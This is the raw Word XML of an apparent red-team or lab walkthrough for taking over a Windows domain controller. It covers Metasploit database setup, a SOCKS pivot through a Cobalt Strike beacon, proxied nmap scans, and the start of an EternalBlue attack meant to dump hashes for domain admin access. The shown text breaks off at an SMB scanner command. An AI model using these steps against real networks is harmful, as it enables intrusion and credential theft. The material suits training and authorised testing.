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3689" w14:textId="70F3DCC7" w:rsidR="007C16F2" w:rsidRDefault="001867D7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00914F81">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Enumeration and Exploitation of Domain Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5669B008" w14:textId="492E8F2E" w:rsidR="0063635E" w:rsidRPr="00914F81" w:rsidRDefault="0063635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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-------------------------------------------</w:t>
      </w:r>
      <w:r w:rsidR="009D12BF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>------Setup---------------------------------------------------</w:t>
      </w:r>
      <w:r w:rsidR="009D12BF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EE7A3C" w14:textId="66B44472" w:rsidR="007C16F2" w:rsidRPr="00914F81" w:rsidRDefault="007C16F2" w:rsidP="007C16F2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00914F81">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Create a Metasploit Database</w:t>
      </w:r>
      <w:r w:rsidR="00A31626" w:rsidRPr="00914F81">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00914F81" w:rsidRPr="00914F81">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>to store hosts and vulnerability data from the scan results done later in the walkthrough.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0E6E64" w14:textId="62B032B4" w:rsidR="007C16F2" w:rsidRPr="00914F81" w:rsidRDefault="007C16F2" w:rsidP="007C16F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root@kali# msfdb init</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EB64D9" w14:textId="53835B24" w:rsidR="008255B6" w:rsidRPr="00914F81" w:rsidRDefault="008255B6" w:rsidP="008255B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Launch msfconsole</w:t>
      </w:r>
      <w:r w:rsidR="00CA529B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> to verify database status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41938CEF" w14:textId="081C1663" w:rsidR="007C16F2" w:rsidRPr="00380E7F" w:rsidRDefault="007C16F2" w:rsidP="00380E7F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msf&gt; db_status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C8B2FA" w14:textId="0F253058" w:rsidR="007C16F2" w:rsidRPr="00914F81" w:rsidRDefault="007C16F2" w:rsidP="0019034A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00914F81">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16D1973B" wp14:editId="01A37B0B">
            <wp:extent cx="3505200" cy="426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048" cy="4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81">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00914F81">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 1: Confirms connectivity to database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A74F0BE" w14:textId="18F6F977" w:rsidR="008255B6" w:rsidRPr="00914F81" w:rsidRDefault="00942C2C" w:rsidP="007C16F2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00914F81">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Configure / </w:t>
      </w:r>
      <w:r w:rsidR="007C16F2" w:rsidRPr="00914F81">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Connect Socks</w:t>
      </w:r>
      <w:r w:rsidR="004E41DF" w:rsidRPr="00914F81">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="004E41DF" w:rsidRPr="00914F81">
          <w:rPr>
            <w:i/>
            <w:iCs/>
          </w:rPr>
          <w:t>https://cobaltstrike.com/help-socks-proxy-pivoting</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="004E41DF" w:rsidRPr="00914F81">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF6ADAD" w14:textId="107E4FA9" w:rsidR="0050439B" w:rsidRPr="00914F81" w:rsidRDefault="0050439B" w:rsidP="007C16F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In Cobalt Strike Client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AED84D3" w14:textId="7E98A65D" w:rsidR="00942C2C" w:rsidRPr="00914F81" w:rsidRDefault="00942C2C" w:rsidP="0050439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 xml:space="preserve">Right Click </w:t>
      </w:r>
      <w:r w:rsidR="008124F5" w:rsidRPr="00914F81">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>on your b</w:t>
      </w:r>
      <w:r w:rsidRPr="00914F81">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">eacon </w:t>
      </w:r>
      <w:r w:rsidRPr="00914F81">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00914F81">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pivoting </w:t>
      </w:r>
      <w:r w:rsidRPr="00914F81">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00914F81">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> Socks Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542E7FEE" w14:textId="188A7D6B" w:rsidR="00942C2C" w:rsidRDefault="00942C2C" w:rsidP="0050439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Enter Proxy port into dialogue box</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201A5DD6" w14:textId="64366D46" w:rsidR="00942C2C" w:rsidRPr="00914F81" w:rsidRDefault="00942C2C" w:rsidP="0050439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 xml:space="preserve">View </w:t>
      </w:r>
      <w:r w:rsidRPr="00914F81">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00914F81">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> Proxy Pivots </w:t>
      </w:r>
      <w:r w:rsidRPr="00914F81">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00914F81">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tunnel (At bottom of the screen)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170B0FE4" w14:textId="3A34E222" w:rsidR="00942C2C" w:rsidRPr="00914F81" w:rsidRDefault="00942C2C" w:rsidP="0050439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Copy command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D3FD6F" w14:textId="5B056704" w:rsidR="0050439B" w:rsidRPr="00914F81" w:rsidRDefault="0050439B" w:rsidP="007C16F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In msfconsole:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0F0B6E" w14:textId="1EBADDF1" w:rsidR="007C16F2" w:rsidRPr="00380E7F" w:rsidRDefault="007C16F2" w:rsidP="00380E7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msf&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00942C2C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&lt;Pasted Command&gt;   (Should look like: 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setg proxies socks4:</w:t>
      </w:r>
      <w:r w:rsidR="009568EB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</w:t>
      </w:r>
      <w:r w:rsidR="0094083B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server IP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&gt;:&lt;</w:t>
      </w:r>
      <w:r w:rsidR="0094083B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Proxy Port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&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00942C2C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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440CFE86" w14:textId="2EC090A8" w:rsidR="009A7205" w:rsidRDefault="007C16F2" w:rsidP="009A7205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msf&gt; setg ReverseAllowProxy true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7A4198" w14:textId="0C65F703" w:rsidR="0063635E" w:rsidRPr="0063635E" w:rsidRDefault="0063635E" w:rsidP="0063635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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>---------------------------------</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>----------</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Enumeration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>----------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E187BB5" w14:textId="3EC1F7E5" w:rsidR="00E06493" w:rsidRPr="009A7205" w:rsidRDefault="00E06493" w:rsidP="00E06493">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A7205">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Host Enumeration</w:t>
      </w:r>
      <w:r w:rsidR="0063635E">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F08B85E" w14:textId="77777777" w:rsidR="005467C3" w:rsidRPr="00914F81" w:rsidRDefault="008F2BB4" w:rsidP="00E0649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 xml:space="preserve">In the Cobalt Strike Client, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64940AB1" w14:textId="137C12CC" w:rsidR="005467C3" w:rsidRPr="00914F81" w:rsidRDefault="005467C3" w:rsidP="005467C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 xml:space="preserve">Right click on beacon </w:t>
      </w:r>
      <w:r w:rsidRPr="00914F81">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00914F81">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> select </w:t>
      </w:r>
      <w:r w:rsidRPr="00914F81">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Interact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E9D4AF" w14:textId="041184AF" w:rsidR="005467C3" w:rsidRPr="00914F81" w:rsidRDefault="005467C3" w:rsidP="005467C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In the beacon type “shell &lt;command&gt;” to enumerate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F711171" w14:textId="1D542A44" w:rsidR="005467C3" w:rsidRPr="00914F81" w:rsidRDefault="005467C3" w:rsidP="001867D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Example commands: systeminfo, ipconfig, net user, etc..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E62AF9" w14:textId="46B856C7" w:rsidR="005467C3" w:rsidRPr="00914F81" w:rsidRDefault="005467C3" w:rsidP="005467C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Use information from enumeration to determine possible networks with the Domain Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755A3E11" w14:textId="6126F88E" w:rsidR="003C5A25" w:rsidRDefault="00E06493" w:rsidP="003C5A25">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00914F81">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Network</w:t>
      </w:r>
      <w:r w:rsidR="001867D7" w:rsidRPr="00914F81">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Enumeration</w:t>
      </w:r>
      <w:r w:rsidR="00E36F52" w:rsidRPr="00914F81">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and OS Fingerprinting</w:t>
      </w:r>
      <w:r w:rsidR="003C5A25">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (Can be done through proxy chains or Metasploit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1A46C3" w14:textId="324FE2CF" w:rsidR="0063635E" w:rsidRPr="0063635E" w:rsidRDefault="0063635E" w:rsidP="003C5A25">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Network Enumeration (Choose either proxychains or Metasploit):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557D2701" w14:textId="4BCDCA79" w:rsidR="003C5A25" w:rsidRDefault="003C5A25" w:rsidP="003C5A2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ProxyChains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E8D82A" w14:textId="71424D12" w:rsidR="003C5A25" w:rsidRDefault="003C5A25" w:rsidP="003C5A2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Edit /etc/proxychains.conf in editor of choosing (vim, nano etc…)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1793A227" w14:textId="32014740" w:rsidR="003C5A25" w:rsidRDefault="003C5A25" w:rsidP="003C5A2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At the bottom of the page add or edit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB5E9A3" w14:textId="6FE2D38E" w:rsidR="003C5A25" w:rsidRDefault="003C5A25" w:rsidP="003C5A25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C5A25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Socks4  &lt;TeamServer IP&gt; &lt;Proxy Port&gt; (two spaces after socks4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B8B5A1" w14:textId="4D03CDDB" w:rsidR="0019034A" w:rsidRPr="0019034A" w:rsidRDefault="003C5A25" w:rsidP="0019034A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file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665B2A11" w14:textId="72A2ED2E" w:rsidR="0019034A" w:rsidRDefault="0019034A" w:rsidP="0019034A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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0D538B" wp14:editId="47BDB5BD">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1511300</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>26035</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3139440" cy="18935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2027B" w14:textId="77777777" w:rsidR="0019034A" w:rsidRDefault="0019034A" w:rsidP="0019034A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="730A5E30" w14:textId="40AF9C2D" w:rsidR="003C5A25" w:rsidRDefault="003C5A25" w:rsidP="003C5A2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 terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C074BD5" w14:textId="66498A1B" w:rsidR="003C5A25" w:rsidRPr="003C5A25" w:rsidRDefault="003C5A25" w:rsidP="003C5A25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C5A25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Proxychains nmap -sV -sT -O -Pn -T3 &lt;PossibleNetworks&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFBAEA0" w14:textId="77777777" w:rsidR="003C5A25" w:rsidRDefault="003C5A25" w:rsidP="003C5A25">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="489E5E5F" w14:textId="3D4E32B2" w:rsidR="003C5A25" w:rsidRPr="003C5A25" w:rsidRDefault="003C5A25" w:rsidP="003C5A25">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C5A25">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403F69AD" w14:textId="4DDA3E8C" w:rsidR="005467C3" w:rsidRPr="00914F81" w:rsidRDefault="005467C3" w:rsidP="001867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In msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8E2673" w14:textId="61BCCF09" w:rsidR="001867D7" w:rsidRPr="00380E7F" w:rsidRDefault="001867D7" w:rsidP="00380E7F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msf&gt; db_nmap -</w:t>
      </w:r>
      <w:r w:rsidR="009568EB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sV -O</w:t>
      </w:r>
      <w:r w:rsidR="00E36F52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</w:t>
      </w:r>
      <w:r w:rsidR="00E06493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-T</w:t>
      </w:r>
      <w:r w:rsidR="009568EB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3</w:t>
      </w:r>
      <w:r w:rsidR="00E06493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&lt;</w:t>
      </w:r>
      <w:r w:rsidR="005467C3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Possible</w:t>
      </w:r>
      <w:r w:rsidR="00E06493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Networ</w:t>
      </w:r>
      <w:r w:rsidR="008F2BB4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ks</w:t>
      </w:r>
      <w:r w:rsidR="00E06493"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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A230E23" w14:textId="553B3B8D" w:rsidR="0063635E" w:rsidRDefault="0063635E" w:rsidP="00E36F52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----------------------</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>----------</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit Domain </w:t>
      </w:r>
      <w:r w:rsidR="00BB23C1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Member </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Computer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5941ECDE" w14:textId="027B422B" w:rsidR="0063635E" w:rsidRPr="0063635E" w:rsidRDefault="0063635E" w:rsidP="00E36F52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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Begin by exploiting a Windows server 2008 Machine</w:t>
      </w:r>
      <w:r w:rsidR="005A0DC3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We will use </w:t>
      </w:r>
      <w:r w:rsidR="005A0DC3" w:rsidRPr="005A0DC3">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="005A0DC3">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ternal</w:t>
      </w:r>
      <w:r w:rsidR="005A0DC3" w:rsidRPr="005A0DC3">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="005A0DC3">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to get into this server on the domain and dump hashes to gain </w:t>
      </w:r>
      <w:r w:rsidR="005A0DC3">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">administrator </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>access to the Domain Controller</w:t>
      </w:r>
      <w:r w:rsidR="005A0DC3">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AC45B4" w14:textId="10F98F88" w:rsidR="00285F53" w:rsidRDefault="00ED096C" w:rsidP="00285F53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Eternal Blue</w:t>
      </w:r>
      <w:r w:rsidR="0063635E">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (On Windows Server 2008 Machine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A803910" w14:textId="69E92E5B" w:rsidR="008124F5" w:rsidRPr="00914F81" w:rsidRDefault="008124F5" w:rsidP="001C42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msf&gt; Use auxiliary/scanner/smb/smb_version</w:t>
      </w:r>
    </w:p>
